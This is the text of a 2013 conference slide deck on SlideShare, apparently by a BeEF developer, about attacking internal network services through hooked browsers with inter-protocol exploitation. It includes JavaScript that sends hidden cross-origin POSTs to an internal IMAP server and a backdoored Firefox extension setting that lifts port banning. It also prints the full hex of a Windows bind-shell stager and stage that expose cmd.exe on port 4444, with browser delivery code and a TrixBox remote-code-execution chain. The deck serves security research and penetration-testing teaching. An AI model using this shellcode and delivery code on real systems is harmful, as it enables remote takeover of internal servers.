SlideShare une entreprise Scribd logo

Rooting Your Internals: Inter-Protocol Exploitation, custom shellcode and BeEF

Michele Orru
Michele Orru

This document discusses using the Browser Exploitation Framework (BeEF) and inter-protocol exploitation techniques to gain control of victim browsers. It begins with an overview of traditional browser attack vectors and their limitations. It then introduces BeEF and how it can be used to hook victim browsers through XSS and control them remotely with JavaScript. The document proposes revitalizing inter-protocol exploitation techniques to bypass cross-domain restrictions and allow executing commands on the victim's machine. It presents the design of a new BeEF Bind shellcode that sets up a web server to accept commands and control a process like cmd.exe on the victim internally without needing an outbound connection.

Technologie
1  sur  41
Télécharger pour lire hors ligne
Rooting your internals: custom shellcode, BeEF and Inter-protocol exploitation antisnatchor HackPra AllStars 2013
About myself •Co-author of Browser Hacker’s Handbook (now on pre-order from Amazon.co.uk, available February/March 2014) •BeEF lead core developer •Application Security researcher •Ruby, Javascript, OpenBSD and BlackMetal fan
• Current situation and traditional browser attack vectors • BeEF and Inter-Protocol Exploitation • The BeEF Bind shellcode • How the shellcode delivery and exploitation works • Demo fun, current limitations and... About The Talk
• Aimed at compromise the browser itself, or plugins • Sandboxes and exploit mitigation techniques make our life difficult • 0-day browser exploits are extremely expensive Current situation traditional browser attack vectors
• Is the victims web browser patched? • Do you have $100k to spend on a single 0-day (weaponized) browser exploit? • How many times can you re-use your 0day for targeted attacks before it will be detected, reversed and patched? • How many useful browser exploits are available? Current situation Browser vulnerability exploitation
• Is the plugin patched or vulnerable? • How reliable are the plugin exploits? • most latest browsers don’t leak anymore exact plugin info (except for Firefox, thanks Mozilla) • Java-based exploits (also for ROP chains) require user- intervention on many current browsers (i.e. Chrome) • From Java 7 even unsigned applets require explicit user intervention to run! (see Immunity bypass - now patched) Current situation Browser plugin exploitation
• Mis-understood, not patched, found in 90% of application pentests • Full DOM manipulation • SOP restrictions, additional HTTP headers restrictions, CSP • In fact, alert(1) is the mostly used attack vector • Oh, wait sorry, also stealing cookies... Current situation Cross Site Scripting
Current situation traditional browser attack vectors Internal server vulnerabilities are sitting there bored and lonely...
• Imagine a framework like Metasploit, but for browser-based attacks • Powerful platform for Client-side pwnage, XSS post-exploitation and generally victim browser security context abuse. • The framework allows the penetration tester to select specific modules (in real-time) to target each browser, and therefore each context. The scary BeEF changing browser attack vectors
• Through a simple XSS or Phishing page, with BeEF we can hook victim browsers and control them entirely with Javascript • No more alert(1) crap • AntiVirus? Fuck that, it’s not going to detect BeEF • Features like ManInTheBrowser,Tunneling Proxy and remote exploits are all implemented in (relatively) simple Javascript The scary BeEF changing browser attack vectors
Idea flow read top to bottom Michele: Awesome, let me do some research and lets port it to BeEF Wade: My IPEC research was cool, we should research further Ty: I developed a new staging shellcode that acts like a WebServer
• Back in 2006/2007 Wade Alcorn researched what he called Inter-Protocol exploitation • Exploit ‘tolerant’ protocol implementations, which do not drop the client connection after N errors • A properly encoded POST request can be sent to the target: • HTTP request headers are parsed as BAD COMMANDS • HTTP request body is parsed asVALID COMMANDS • HTTP request body also contains shellcode. FUN STARTS Revitalizing IPEC Inter-Protocol Exploitation
Revitalizing IPEC Inter-Protocol Exploitation: IMAP var server = '172.16.37.151'; var port = '143'; var commands = 'a01 login root passwordna002 logout'; var target = "http://" + server + ":" + port + "/abc.html"; var iframe = beef.dom.createInvisibleIframe(); var form = document.createElement('form'); form.setAttribute('name', 'data'); form.setAttribute('action', target); form.setAttribute('method', 'post'); form.setAttribute('enctype', 'text/plain'); var input = document.createElement('input'); input.setAttribute('id', 'data1') input.setAttribute('name', 'data1') input.setAttribute('type', 'hidden'); input.setAttribute('value', commands); form.appendChild(input); iframe.contentWindow.document.body.appendChild(form); form.submit();
• Limitations: • SOP and cross-domain restrictions • Port Banning (damn you!) • HTTP Headers size • HTTP Content-Type settings • After exploitation, back to normal out-of-browser shells? NOPE :D Revitalizing IPEC Inter-Protocol Exploitation: limitations
• Limitations: • SOP and cross-domain restrictions •PortBanning •HTTP Headers size •HTTP Content-Type settings •After exploitation, back to normal out-of-browser shells? Revitalizing IPEC Inter-Protocol Exploitation: solution 1 On all browsers (except Opera) we can ‘blindly’ send data cross-origin with XHR, without the need to read HTTP responses. This is (usually) enough to pwn services.
• Limitations: •SOP and cross-domain restrictions • PortBanning •HTTP Headers size •HTTP Content-Type settings •After exploitation, back to normal out-of-browser shells? Revitalizing IPEC Inter-Protocol Exploitation: solution 2 http://xyz.com:143/ FF: NS_ERROR_PORT_ACCESS_NOT_ALLOWED Connection to various known port (22/25/143/993/995/etc..) denied. On Firefox, an extension can override config options:
• Limitations: •SOP and cross-domain restrictions • PortBanning •HTTP Headers size •HTTP Content-Type settings •After exploitation, back to normal out-of-browser shells? Revitalizing IPEC Inter-Protocol Exploitation: solution 2 Trick the victim to install a backdoor’ed Firefox extension.The pref.js file of the extension contains: // PortBanning override pref("network.security.ports.banned.override", "20,21,22,25,110,143");
• Limitations: •SOP and cross-domain restrictions • PortBanning •HTTP Headers size •HTTP Content-Type settings •After exploitation, back to normal out-of-browser shells? Revitalizing IPEC Inter-Protocol Exploitation: solution 2 Only about 60 TCP ports are prohibited by Port Banning -> 65465 are allowed :D 220 - imap3 (only IE blocks it :-) 6667 - IRC (Firefox/IE only) 9100 - jetdirect 10000 - ExtraNET you name it: HP OpenView, Java RMI stuff, etc..
• Limitations: • SOP and cross-domain restrictions • PortBanning • HTTP Headers size • HTTP Content-Type settings • After exploitation, back to normal out-of-browser shells? Revitalizing IPEC Inter-Protocol Exploitation: solution 3 Lots of HTTP headers are automatically created by the browser (around 400 bytes). Most of them cannot be overridden, and cross-domain they are even bigger. We can override some of them:
• Limitations: • SOP and cross-domain restrictions • PortBanning • HTTP Headers size • HTTP Content-Type settings • After exploitation, back to normal out-of-browser shells? Revitalizing IPEC Inter-Protocol Exploitation: solution 3 We can save other 100 bytes overriding the UserAgent through the Firefox extension: pref("general.useragent.override", "Firefox/15.0.1");
• Limitations: • SOP and cross-domain restrictions • PortBanning • HTTP Headers size • HTTP Content-Type settings • After exploitation, back to normal out-of-browser shells? Revitalizing IPEC Inter-Protocol Exploitation: solution 4 The original IPEC paper was using: Content-Type: multipart/form-data; Our approach uses, to save space: Content-Type: text/plain;
• Limitations: • SOP and cross-domain restrictions • PortBanning • HTTP Headers size • HTTP Content-Type settings • After exploitation, back to normal out-of-browser shells? Revitalizing IPEC Inter-Protocol Exploitation: solution 5 Not anymore, thanks to the BeEF Bind shellcode. You have a bind shellcode which can be totally controlled through an hooked browser sitting in the same victim internal network.
High Level Architecture from FF extension to command execution
High Level Architecture from FF extension to command execution
High Level Architecture from FF extension to command execution
High Level Architecture from FF extension to command execution
High Level Architecture from FF extension to command execution
28 BeEF Bind shellcode how it works • Ty Miller created a new staging Windows shellcode, which we called BeEF Bind • He was bored of reverse shells :D • stager -> 299 bytes (326 after bad-char encoding) • stage -> 792 bytes • The stager sets up a bind port on 4444/TCP to accept an HTTP POST request containing the raw stage in a parameter called ‘cmd’. var stager = "xbax6ax99xf8x25xd9xccxd9x74x24xf4x5ex31xc9" + "xb1x4bx83xc6x04x31x56x11x03x56x11xe2x9fx65" + "x10xacx5fx96xe1xcfxd6x73xd0xddx8cxf0x41xd2" + "xc7x55x6ax99x85x4dxf9xefx01x61x4ax45x77x4c" + "x4bx6bxb7x02x8fxedx4bx59xdcxcdx72x92x11x0f" + "xb3xcfxdax5dx6cx9bx49x72x19xd9x51x73xcdx55" + "xe9x0bx68xa9x9exa1x73xfax0fxbdx3bxe2x24x99" + "x9bx13xe8xf9xe7x5ax85xcax9cx5cx4fx03x5dx6f" + "xafxc8x60x5fx22x10xa5x58xddx67xddx9ax60x70" + "x26xe0xbexf5xbax42x34xadx1ex72x99x28xd5x78" + "x56x3exb1x9cx69x93xcax99xe2x12x1cx28xb0x30" + "xb8x70x62x58x99xdcxc5x65xf9xb9xbaxc3x72x2b" + "xaex72xd9x24x03x49xe1xb4x0bxdax92x86x94x70" + "x3cxabx5dx5fxbbxccx77x27x53x33x78x58x7axf0" + "x2cx08x14xd1x4cxc3xe4xdex98x44xb4x70x73x25" + "x64x31x23xcdx6exbex1cxedx91x14x35xdfxb6xc4" + "x52x22x48xfaxfexabxaex96xeexfdx79x0fxcdxd9" + "xb2xa8x2ex08xefx61xb9x04xe6xb6xc6x94x2dx95" + "x6bx3cxa5x6ex60xf9xd4x70xadxa9x81xe7x3bx38" + "xe0x96x3cx11x41x58xd3x9axb5x33x93xc9xe6xa9" + "x13x86x50x8ax47xb3x9fx07xeexfdx35xa8xa2x51" + "x9exc0x46x8bxe8x4exb8xfexbfx18x80x97xb8x8b" + "xf3x4dx47x15x6fx03x23x57x1bxd8xedx4cx16x5d" + "x37x96x26x84";
29 BeEF Bind shellcode how it works • The stage sets up a bind port on 4444/TCP to accept HTTP POST requests from the web browser. • Set of pipes to redirect the cmd.exe input and output. This allows to jump in the middle of the HTTP request and the cmd.exe process to implement the web server style functionality. • The command result output is returned with the Access-Control-Allow-Origin: * header. After the stage is deployed, SOP is not a problem anymore. var stage_allow_origin = "xfcxe8x89x00x00x00x60x89xe5x31xd2x64x8bx52x30x8bx52x0cx8bx52x14x8bx72x28" "x0fxb7x4ax26x31xffx31xc0xacx3cx61x7cx02x2cx20xc1xcfx0dx01xc7xe2xf0x52" + "x57x8bx52x10x8bx42x3cx01xd0x8bx40x78x85xc0x74x4ax01xd0x50x8bx48x18x8b" + "x58x20x01xd3xe3x3cx49x8bx34x8bx01xd6x31xffx31xc0xacxc1xcfx0dx01xc7x38" + "xe0x75xf4x03x7dxf8x3bx7dx24x75xe2x58x8bx58x24x01xd3x66x8bx0cx4bx8bx58" + "x1cx01xd3x8bx04x8bx01xd0x89x44x24x24x5bx5bx61x59x5ax51xffxe0x58x5fx5a" + "x8bx12xebx86x5dxbbx00x10x00x00x6ax40x53x53x6ax00x68x58xa4x53xe5xffxd5" + "x89xc6x68x01x00x00x00x68x00x00x00x00x68x0cx00x00x00x68x00x00x00x00x89" + "xe3x68x00x00x00x00x89xe1x68x00x00x00x00x8dx7cx24x0cx57x53x51x68x3excf" + "xafx0exffxd5x68x00x00x00x00x89xe3x68x00x00x00x00x89xe1x68x00x00x00x00" + "x8dx7cx24x14x57x53x51x68x3excfxafx0exffxd5x8bx5cx24x08x68x00x00x00x00" + "x68x01x00x00x00x53x68xcax13xd3x1cxffxd5x8bx5cx24x04x68x00x00x00x00x68" + "x01x00x00x00x53x68xcax13xd3x1cxffxd5x89xf7x68x63x6dx64x00x89xe3xffx74" + "x24x10xffx74x24x14xffx74x24x0cx31xf6x6ax12x59x56xe2xfdx66xc7x44x24x3c" + "x01x01x8dx44x24x10xc6x00x44x54x50x56x56x56x46x56x4ex56x56x53x56x68x79" + "xccx3fx86xffxd5x89xfexb9xf8x0fx00x00x8dx46x08xc6x00x00x40xe2xfax56x8d" + "xbex18x04x00x00xe8x62x00x00x00x48x54x54x50x2fx31x2ex31x20x32x30x30x20" + "x4fx4bx0dx0ax43x6fx6ex74x65x6ex74x2dx54x79x70x65x3ax20x74x65x78x74x2f" + "x68x74x6dx6cx0dx0ax41x63x63x65x73x73x2dx43x6fx6ex74x72x6fx6cx2dx41x6c" + "x6cx6fx77x2dx4fx72x69x67x69x6ex3ax20x2ax0dx0ax43x6fx6ex74x65x6ex74x2d" + "x4cx65x6ex67x74x68x3ax20x33x30x31x36x0dx0ax0dx0ax5exb9x62x00x00x00xf3" + "xa4x5ex56x68x33x32x00x00x68x77x73x32x5fx54x68x4cx77x26x07xffxd5xb8x90" + "x01x00x00x29xc4x54x50x68x29x80x6bx00xffxd5x50x50x50x50x40x50x40x50x68" + "xeax0fxdfxe0xffxd5x97x31xdbx53x68x02x00x11x5cx89xe6x6ax10x56x57x68xc2" + "xdbx37x67xffxd5x53x57x68xb7xe9x38xffxffxd5x53x53x57x68x74xecx3bxe1xff" + "xd5x57x97x68x75x6ex4dx61xffxd5x81xc4xa0x01x00x00x5ex89x3ex6ax00x68x00" + "x04x00x00x89xf3x81xc3x08x00x00x00x53xffx36x68x02xd9xc8x5fxffxd5x8bx54" + "x24x64xb9x00x04x00x00x81x3bx63x6dx64x3dx74x06x43x49xe3x3axebxf2x81xc3" + "x03x00x00x00x43x53x68x00x00x00x00x8dxbex10x04x00x00x57x68x01x00x00x00" + "x53x8bx5cx24x70x53x68x2dx57xaex5bxffxd5x5bx80x3bx0ax75xdax68xe8x03x00" + "x00x68x44xf0x35xe0xffxd5x31xc0x50x8dx5ex04x53x50x50x50x8dx5cx24x74x8b" + "x1bx53x68x18xb7x3cxb3xffxd5x85xc0x74x44x8bx46x04x85xc0x74x3dx68x00x00" + "x00x00x8dxbex14x04x00x00x57x68x86x0bx00x00x8dxbex7ax04x00x00x57x8dx5c" + "x24x70x8bx1bx53x68xadx9ex5fxbbxffxd5x6ax00x68xe8x0bx00x00x8dxbex18x04" + "x00x00x57xffx36x68xc2xebx38x5fxffxd5xffx36x68xc6x96x87x52xffxd5xe9x38" + "xfexffxff";
• Shellcode is binary data • Stager and Stage are delivered with XMLHttpRequest.sendAsBinary • For Webkit browsers that don’t support sendAsBinary, prototype overriding on XHR object. BeEF Bind shellcode delivery and usage from within BeEF if (!XMLHttpRequest.prototype.sendAsBinary) { XMLHttpRequest.prototype.sendAsBinary = function (sData) { var nBytes = sData.length, ui8Data = new Uint8Array(nBytes); for (var nIdx = 0; nIdx < nBytes; nIdx++) { ui8Data[nIdx] = sData.charCodeAt(nIdx) & 0xff; } this.send(ui8Data); };} Stager - Stage
• We cannot know in advance the exact size of HTTP headers. • A dummy cross-domain XHR request is sent back to BeEF, exact size of headers is calculated, and exploit junk is adjusted accordingly. • Like in all exploits, 1 byte error is enough to have a not-working exploit. • With this approach, errors are minimized and the exploit becomes reliable. BeEF Bind shellcode delivery and usage from within BeEF
• Typical SEH exploit with EggHunter, non-IPEC: • commands + junk + shellcode + next_seh + seh + egg_hunter • Typical SEH exploit with EggHunter, IPEC: • HTTP_headers + commands + (less)junk + shellcode + next_seh + seh + egg_hunter BeEF Bind shellcode delivery and usage from within BeEF
BeEF Bind shellcode delivery and usage from within BeEF Immunity DBG view: IMAP process memory when sending the stager
BeEF Bind shellcode delivery and usage from within BeEF Wireshark view: exploit with shellcode stager Wireshark view: command delivery and results
35 BeEF Bind shellcode delivery and usage from within BeEF Ultimate fun. BeEF IPEC shell (JS) exec command get results set target
Demo fun from phishing to internal IMAP server compromise
• Bart Leppens ported the Win32 BeEF Bind shellcode to Linux • Great to be used as shellcode for normal Linux exploits • Great to be used as a binary with any Remote Command Execution • TrixBox <= 2.6.1 pre-auth RCE example with BeEF Bind Linux • Exploit here (through normal sockets, not from the browsers): http://www.exploit-db.com/exploits/6026/ BeEF Bind shellcode delivery and usage from within BeEF
• Identify TrixBox in the hooked browser internal network (BeEF “internal_network_fingerprinting”module) • Get the current PHPSESSID, needed to trigger the malicious PHP code that will be leaving in PHP’s $_SESSION object • The attack vector downloads the BeEF Bind shellcode stager and executes it • Last step is send to the stager bind port the Stage contents • You’re now ready to send commands and get results from the hooked browser BeEF Bind shellcode delivery and usage from within BeEF
Demo fun TrixBox RCE exploitation from the browser
• Wade and the other BeEF guys • Ty and Bart for their awesome shellcodes • Mario and the other awesome speakers • If you want to support BeEF, buy our book. 50% of royalties will be used exclusively for the BeEF project (no joke)! • http://www.amazon.co.uk/Browser-Hackers-Handbook- Wade-Alcorn/dp/1118662091/ Thanks
Questions?

Recommandé

I'm the butcher would you like some BeEF
I'm the butcher would you like some BeEFI'm the butcher would you like some BeEF
I'm the butcher would you like some BeEFMichele Orru
 
Dark Fairytales from a Phisherman (Vol. II)
Dark Fairytales from a Phisherman (Vol. II)Dark Fairytales from a Phisherman (Vol. II)
Dark Fairytales from a Phisherman (Vol. II)Michele Orru
 
Rooting your internals - Exploiting Internal Network Vulns via the Browser Us...
Rooting your internals - Exploiting Internal Network Vulns via the Browser Us...Rooting your internals - Exploiting Internal Network Vulns via the Browser Us...
Rooting your internals - Exploiting Internal Network Vulns via the Browser Us...Michele Orru
 
Dark Fairytales from a Phisherman
Dark Fairytales from a PhishermanDark Fairytales from a Phisherman
Dark Fairytales from a PhishermanMichele Orru
 
Buried by time, dust and BeEF
Buried by time, dust and BeEFBuried by time, dust and BeEF
Buried by time, dust and BeEFMichele Orru
 
Practical Phishing Automation with PhishLulz - KiwiCon X
Practical Phishing Automation with PhishLulz - KiwiCon XPractical Phishing Automation with PhishLulz - KiwiCon X
Practical Phishing Automation with PhishLulz - KiwiCon XMichele Orru
 
ZeroNights2012_BeEF_Workshop_antisnatchor
ZeroNights2012_BeEF_Workshop_antisnatchorZeroNights2012_BeEF_Workshop_antisnatchor
ZeroNights2012_BeEF_Workshop_antisnatchorMichele Orru
 
Html5: Something wicked this way comes (Hack in Paris)
Html5: Something wicked this way comes (Hack in Paris)Html5: Something wicked this way comes (Hack in Paris)
Html5: Something wicked this way comes (Hack in Paris)Krzysztof Kotowicz
 

Recommandé

I'm the butcher would you like some BeEF
I'm the butcher would you like some BeEFI'm the butcher would you like some BeEF
I'm the butcher would you like some BeEFMichele Orru
 
Dark Fairytales from a Phisherman (Vol. II)
Dark Fairytales from a Phisherman (Vol. II)Dark Fairytales from a Phisherman (Vol. II)
Dark Fairytales from a Phisherman (Vol. II)Michele Orru
 
Rooting your internals - Exploiting Internal Network Vulns via the Browser Us...
Rooting your internals - Exploiting Internal Network Vulns via the Browser Us...Rooting your internals - Exploiting Internal Network Vulns via the Browser Us...
Rooting your internals - Exploiting Internal Network Vulns via the Browser Us...Michele Orru
 
Dark Fairytales from a Phisherman
Dark Fairytales from a PhishermanDark Fairytales from a Phisherman
Dark Fairytales from a PhishermanMichele Orru
 
Buried by time, dust and BeEF
Buried by time, dust and BeEFBuried by time, dust and BeEF
Buried by time, dust and BeEFMichele Orru
 
Practical Phishing Automation with PhishLulz - KiwiCon X
Practical Phishing Automation with PhishLulz - KiwiCon XPractical Phishing Automation with PhishLulz - KiwiCon X
Practical Phishing Automation with PhishLulz - KiwiCon XMichele Orru
 
ZeroNights2012_BeEF_Workshop_antisnatchor
ZeroNights2012_BeEF_Workshop_antisnatchorZeroNights2012_BeEF_Workshop_antisnatchor
ZeroNights2012_BeEF_Workshop_antisnatchorMichele Orru
 
Html5: Something wicked this way comes (Hack in Paris)
Html5: Something wicked this way comes (Hack in Paris)Html5: Something wicked this way comes (Hack in Paris)
Html5: Something wicked this way comes (Hack in Paris)Krzysztof Kotowicz
 
SANS DFIR Prague: PowerShell & WMI
SANS DFIR Prague: PowerShell & WMISANS DFIR Prague: PowerShell & WMI
SANS DFIR Prague: PowerShell & WMIJoe Slowik
 
WordPress security for everyone
WordPress security for everyoneWordPress security for everyone
WordPress security for everyoneVladimír Smitka
 
Anthony Somerset - Site Speed = Success!
Anthony Somerset - Site Speed = Success!Anthony Somerset - Site Speed = Success!
Anthony Somerset - Site Speed = Success!WordCamp Cape Town
 
Advanced Chrome extension exploitation
Advanced Chrome extension exploitationAdvanced Chrome extension exploitation
Advanced Chrome extension exploitationKrzysztof Kotowicz
 
Krzysztof Kotowicz - Hacking HTML5
Krzysztof Kotowicz - Hacking HTML5Krzysztof Kotowicz - Hacking HTML5
Krzysztof Kotowicz - Hacking HTML5DefconRussia
 
WordPress Security: Defend yourself against digital invaders
WordPress Security: Defend yourself against digital invadersWordPress Security: Defend yourself against digital invaders
WordPress Security: Defend yourself against digital invadersVladimír Smitka
 
WordPress performance tuning
WordPress performance tuningWordPress performance tuning
WordPress performance tuningVladimír Smitka
 
Catch Me If You Can: PowerShell Red vs Blue
Catch Me If You Can: PowerShell Red vs BlueCatch Me If You Can: PowerShell Red vs Blue
Catch Me If You Can: PowerShell Red vs BlueWill Schroeder
 
Domino Security - not knowing is not an option (2016 edition)
Domino Security - not knowing is not an option (2016 edition)Domino Security - not knowing is not an option (2016 edition)
Domino Security - not knowing is not an option (2016 edition)Darren Duke
 
Improve WordPress performance with caching and deferred execution of code
Improve WordPress performance with caching and deferred execution of codeImprove WordPress performance with caching and deferred execution of code
Improve WordPress performance with caching and deferred execution of codeDanilo Ercoli
 
BeEF_EUSecWest-2012_Michele-Orru
BeEF_EUSecWest-2012_Michele-OrruBeEF_EUSecWest-2012_Michele-Orru
BeEF_EUSecWest-2012_Michele-OrruMichele Orru
 
Mobile Hybrid Development with WordPress
Mobile Hybrid Development with WordPressMobile Hybrid Development with WordPress
Mobile Hybrid Development with WordPressDanilo Ercoli
 
WordPress Development Tools and Best Practices
WordPress Development Tools and Best PracticesWordPress Development Tools and Best Practices
WordPress Development Tools and Best PracticesDanilo Ercoli
 
Roy foubister (hosting high traffic sites on a tight budget)
Roy foubister (hosting high traffic sites on a tight budget)Roy foubister (hosting high traffic sites on a tight budget)
Roy foubister (hosting high traffic sites on a tight budget)WordCamp Cape Town
 
Dirty Little Secrets They Didn't Teach You In Pentest Class v2
Dirty Little Secrets They Didn't Teach You In Pentest Class v2Dirty Little Secrets They Didn't Teach You In Pentest Class v2
Dirty Little Secrets They Didn't Teach You In Pentest Class v2Rob Fuller
 
Secure Your Wordpress
Secure Your WordpressSecure Your Wordpress
Secure Your Wordpressn|u - The Open Security Community
 
Php push notifications
Php push notificationsPhp push notifications
Php push notificationsMohammed Shurrab
 
A @textfiles approach to gathering the world's DNS
A @textfiles approach to gathering the world's DNSA @textfiles approach to gathering the world's DNS
A @textfiles approach to gathering the world's DNSRob Fuller
 
NotaCon 2011 - Networking for Pentesters
NotaCon 2011 - Networking for PentestersNotaCon 2011 - Networking for Pentesters
NotaCon 2011 - Networking for PentestersRob Fuller
 
Bypass file upload restrictions
Bypass file upload restrictionsBypass file upload restrictions
Bypass file upload restrictionsMukesh k.r
 
Advances in BeEF - AthCon2012
Advances in BeEF - AthCon2012Advances in BeEF - AthCon2012
Advances in BeEF - AthCon2012Michele Orru
 
07 - Bypassing ASLR, or why X^W matters
07 - Bypassing ASLR, or why X^W matters07 - Bypassing ASLR, or why X^W matters
07 - Bypassing ASLR, or why X^W mattersAlexandre Moneger
 

Contenu connexe

Tendances

SANS DFIR Prague: PowerShell & WMI
SANS DFIR Prague: PowerShell & WMISANS DFIR Prague: PowerShell & WMI
SANS DFIR Prague: PowerShell & WMIJoe Slowik
 
WordPress security for everyone
WordPress security for everyoneWordPress security for everyone
WordPress security for everyoneVladimír Smitka
 
Anthony Somerset - Site Speed = Success!
Anthony Somerset - Site Speed = Success!Anthony Somerset - Site Speed = Success!
Anthony Somerset - Site Speed = Success!WordCamp Cape Town
 
Advanced Chrome extension exploitation
Advanced Chrome extension exploitationAdvanced Chrome extension exploitation
Advanced Chrome extension exploitationKrzysztof Kotowicz
 
Krzysztof Kotowicz - Hacking HTML5
Krzysztof Kotowicz - Hacking HTML5Krzysztof Kotowicz - Hacking HTML5
Krzysztof Kotowicz - Hacking HTML5DefconRussia
 
WordPress Security: Defend yourself against digital invaders
WordPress Security: Defend yourself against digital invadersWordPress Security: Defend yourself against digital invaders
WordPress Security: Defend yourself against digital invadersVladimír Smitka
 
WordPress performance tuning
WordPress performance tuningWordPress performance tuning
WordPress performance tuningVladimír Smitka
 
Catch Me If You Can: PowerShell Red vs Blue
Catch Me If You Can: PowerShell Red vs BlueCatch Me If You Can: PowerShell Red vs Blue
Catch Me If You Can: PowerShell Red vs BlueWill Schroeder
 
Domino Security - not knowing is not an option (2016 edition)
Domino Security - not knowing is not an option (2016 edition)Domino Security - not knowing is not an option (2016 edition)
Domino Security - not knowing is not an option (2016 edition)Darren Duke
 
Improve WordPress performance with caching and deferred execution of code
Improve WordPress performance with caching and deferred execution of codeImprove WordPress performance with caching and deferred execution of code
Improve WordPress performance with caching and deferred execution of codeDanilo Ercoli
 
BeEF_EUSecWest-2012_Michele-Orru
BeEF_EUSecWest-2012_Michele-OrruBeEF_EUSecWest-2012_Michele-Orru
BeEF_EUSecWest-2012_Michele-OrruMichele Orru
 
Mobile Hybrid Development with WordPress
Mobile Hybrid Development with WordPressMobile Hybrid Development with WordPress
Mobile Hybrid Development with WordPressDanilo Ercoli
 
WordPress Development Tools and Best Practices
WordPress Development Tools and Best PracticesWordPress Development Tools and Best Practices
WordPress Development Tools and Best PracticesDanilo Ercoli
 
Roy foubister (hosting high traffic sites on a tight budget)
Roy foubister (hosting high traffic sites on a tight budget)Roy foubister (hosting high traffic sites on a tight budget)
Roy foubister (hosting high traffic sites on a tight budget)WordCamp Cape Town
 
Dirty Little Secrets They Didn't Teach You In Pentest Class v2
Dirty Little Secrets They Didn't Teach You In Pentest Class v2Dirty Little Secrets They Didn't Teach You In Pentest Class v2
Dirty Little Secrets They Didn't Teach You In Pentest Class v2Rob Fuller
 
A @textfiles approach to gathering the world's DNS
A @textfiles approach to gathering the world's DNSA @textfiles approach to gathering the world's DNS
A @textfiles approach to gathering the world's DNSRob Fuller
 
NotaCon 2011 - Networking for Pentesters
NotaCon 2011 - Networking for PentestersNotaCon 2011 - Networking for Pentesters
NotaCon 2011 - Networking for PentestersRob Fuller
 
Bypass file upload restrictions
Bypass file upload restrictionsBypass file upload restrictions
Bypass file upload restrictionsMukesh k.r
 

Tendances (20)

SANS DFIR Prague: PowerShell & WMI
SANS DFIR Prague: PowerShell & WMISANS DFIR Prague: PowerShell & WMI
SANS DFIR Prague: PowerShell & WMI
 
WordPress security for everyone
WordPress security for everyoneWordPress security for everyone
WordPress security for everyone
 
Anthony Somerset - Site Speed = Success!
Anthony Somerset - Site Speed = Success!Anthony Somerset - Site Speed = Success!
Anthony Somerset - Site Speed = Success!
 
Advanced Chrome extension exploitation
Advanced Chrome extension exploitationAdvanced Chrome extension exploitation
Advanced Chrome extension exploitation
 
Krzysztof Kotowicz - Hacking HTML5
Krzysztof Kotowicz - Hacking HTML5Krzysztof Kotowicz - Hacking HTML5
Krzysztof Kotowicz - Hacking HTML5
 
WordPress Security: Defend yourself against digital invaders
WordPress Security: Defend yourself against digital invadersWordPress Security: Defend yourself against digital invaders
WordPress Security: Defend yourself against digital invaders
 
WordPress performance tuning
WordPress performance tuningWordPress performance tuning
WordPress performance tuning
 
Catch Me If You Can: PowerShell Red vs Blue
Catch Me If You Can: PowerShell Red vs BlueCatch Me If You Can: PowerShell Red vs Blue
Catch Me If You Can: PowerShell Red vs Blue
 
Domino Security - not knowing is not an option (2016 edition)
Domino Security - not knowing is not an option (2016 edition)Domino Security - not knowing is not an option (2016 edition)
Domino Security - not knowing is not an option (2016 edition)
 
Improve WordPress performance with caching and deferred execution of code
Improve WordPress performance with caching and deferred execution of codeImprove WordPress performance with caching and deferred execution of code
Improve WordPress performance with caching and deferred execution of code
 
BeEF_EUSecWest-2012_Michele-Orru
BeEF_EUSecWest-2012_Michele-OrruBeEF_EUSecWest-2012_Michele-Orru
BeEF_EUSecWest-2012_Michele-Orru
 
Mobile Hybrid Development with WordPress
Mobile Hybrid Development with WordPressMobile Hybrid Development with WordPress
Mobile Hybrid Development with WordPress
 
WordPress Development Tools and Best Practices
WordPress Development Tools and Best PracticesWordPress Development Tools and Best Practices
WordPress Development Tools and Best Practices
 
Roy foubister (hosting high traffic sites on a tight budget)
Roy foubister (hosting high traffic sites on a tight budget)Roy foubister (hosting high traffic sites on a tight budget)
Roy foubister (hosting high traffic sites on a tight budget)
 
Dirty Little Secrets They Didn't Teach You In Pentest Class v2
Dirty Little Secrets They Didn't Teach You In Pentest Class v2Dirty Little Secrets They Didn't Teach You In Pentest Class v2
Dirty Little Secrets They Didn't Teach You In Pentest Class v2
 
Secure Your Wordpress
Secure Your WordpressSecure Your Wordpress
Secure Your Wordpress
 
Php push notifications
Php push notificationsPhp push notifications
Php push notifications
 
A @textfiles approach to gathering the world's DNS
A @textfiles approach to gathering the world's DNSA @textfiles approach to gathering the world's DNS
A @textfiles approach to gathering the world's DNS
 
NotaCon 2011 - Networking for Pentesters
NotaCon 2011 - Networking for PentestersNotaCon 2011 - Networking for Pentesters
NotaCon 2011 - Networking for Pentesters
 
Bypass file upload restrictions
Bypass file upload restrictionsBypass file upload restrictions
Bypass file upload restrictions
 

En vedette

Advances in BeEF - AthCon2012
Advances in BeEF - AthCon2012Advances in BeEF - AthCon2012
Advances in BeEF - AthCon2012Michele Orru
 
07 - Bypassing ASLR, or why X^W matters
07 - Bypassing ASLR, or why X^W matters07 - Bypassing ASLR, or why X^W matters
07 - Bypassing ASLR, or why X^W mattersAlexandre Moneger
 
Efficient Bytecode Analysis: Linespeed Shellcode Detection
Efficient Bytecode Analysis: Linespeed Shellcode DetectionEfficient Bytecode Analysis: Linespeed Shellcode Detection
Efficient Bytecode Analysis: Linespeed Shellcode DetectionGeorg Wicherski
 
Linux Shellcode disassembling
Linux Shellcode disassemblingLinux Shellcode disassembling
Linux Shellcode disassemblingHarsh Daftary
 
Design and implementation_of_shellcodes
Design and implementation_of_shellcodesDesign and implementation_of_shellcodes
Design and implementation_of_shellcodesAmr Ali
 
Anatomy of A Shell Code, Reverse engineering
Anatomy of A Shell Code, Reverse engineeringAnatomy of A Shell Code, Reverse engineering
Anatomy of A Shell Code, Reverse engineeringAbhineet Ayan
 
Shellcode and heapspray detection in phoneyc
Shellcode and heapspray detection in phoneycShellcode and heapspray detection in phoneyc
Shellcode and heapspray detection in phoneycZ Chen
 
05 - Bypassing DEP, or why ASLR matters
05 - Bypassing DEP, or why ASLR matters05 - Bypassing DEP, or why ASLR matters
05 - Bypassing DEP, or why ASLR mattersAlexandre Moneger
 
Java Shellcode Execution
Java Shellcode ExecutionJava Shellcode Execution
Java Shellcode ExecutionRyan Wincey
 
Exploit Research and Development Megaprimer: Unicode Based Exploit Development
Exploit Research and Development Megaprimer: Unicode Based Exploit DevelopmentExploit Research and Development Megaprimer: Unicode Based Exploit Development
Exploit Research and Development Megaprimer: Unicode Based Exploit DevelopmentAjin Abraham
 
